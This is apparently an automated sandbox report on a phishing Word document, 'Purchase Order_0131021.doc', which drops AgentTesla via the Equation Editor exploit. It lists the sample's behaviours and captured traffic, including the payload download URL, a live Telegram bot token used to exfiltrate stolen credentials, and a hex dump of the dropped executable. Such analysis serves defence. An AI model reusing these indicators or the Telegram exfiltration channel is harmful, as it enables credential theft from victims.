Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Sample Name:	Purchase Order_0131021.doc
Analysis ID:	502700
MD5:	fc66be4a9696798aff0be8ed97bd294f
SHA1:	cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256:	8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected AgentTesla

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal ftp login credentials

Uses the Telegram API (likely for C&C communication)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Binary or sample is protected by dotNetProtector

Injects a PE file into a foreign processes

Office equation editor drops PE file

.NET source code contains very large array initializations

Machine Learning detection for dropped file

Tries to steal Mail credentials (via file access)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to launch a process as a different user

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 5.2.gudostrp.exe.400000.1.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
Source: gudostrp.exe.2576.5.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Purchase Order_0131021.doc	Virustotal: Detection: 36%			Perma Link
Source: Purchase Order_0131021.doc	ReversingLabs: Detection: 35%

Antivirus detection for URL or domain

Source: http://palangavra.lt/jukiestay/gufoxqa.exe

Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: palangavra.lt

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

Networking:

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 08:22:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 14 Oct 2021 01:10:12 GMTAccept-Ranges: bytesContent-Length: 486912Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443

Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp	String found in binary or memory: http://SwonTwAJYn3XCAV3.net
Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: http://yBlQIu.com
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgP
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: palangavra.lt

Source: global traffic

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 5.2.gudostrp.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bCB2C1C74u002d7A68u002d46F5u002dB599u002d45991AE15A88u007d/A406E5E7u002dDEBAu002d4106u002dAAAEu002dB593294D8F00.cs

Large array initialization: .cctor: array initializer size 12005

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030348D	4_2_0030348D
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_00308ED7	4_2_00308ED7
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_00721D30	4_2_00721D30
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA5EA8	4_2_01FA5EA8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA0006	4_2_01FA0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB0048	4_2_01FB0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB5720	4_2_01FB5720
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC0048	4_2_01FC0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC5620	4_2_01FC5620
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FC929C	4_2_01FC929C
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD0048	4_2_01FD0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD90FD	4_2_01FD90FD
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD5908	4_2_01FD5908
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FD0006	4_2_01FD0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_02025CE8	4_2_02025CE8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_020319A2	4_2_020319A2
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D0048	4_2_041D0048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041DE168	4_2_041DE168
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030364F	4_2_0030364F
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB0006	4_2_01FB0006
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00256048	5_2_00256048
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025F2B8	5_2_0025F2B8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00255430	5_2_00255430
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025D458	5_2_0025D458
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00255778	5_2_00255778
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0025AF40	5_2_0025AF40
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00252197	5_2_00252197
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00559C40	5_2_00559C40
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_005502F1	5_2_005502F1
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_005537E8	5_2_005537E8
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00556E48	5_2_00556E48
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00559468	5_2_00559468
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0055B520	5_2_0055B520
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00553F9D	5_2_00553F9D

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Code function: 4_2_00726CD0 CreateProcessAsUserW,

4_2_00726CD0

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: Purchase Order_0131021.doc	Virustotal: Detection: 36%
Source: Purchase Order_0131021.doc	ReversingLabs: Detection: 35%

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rchase Order_0131021.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: gudostrp.exe.2.dr, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: gufoxqa[1].exe.2.dr, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 4.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 4.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 5.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
Source: 5.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs	Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'

Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Binary or sample is protected by dotNetProtector

Source: gudostrp.exe	String found in binary or memory: dotNetProtector
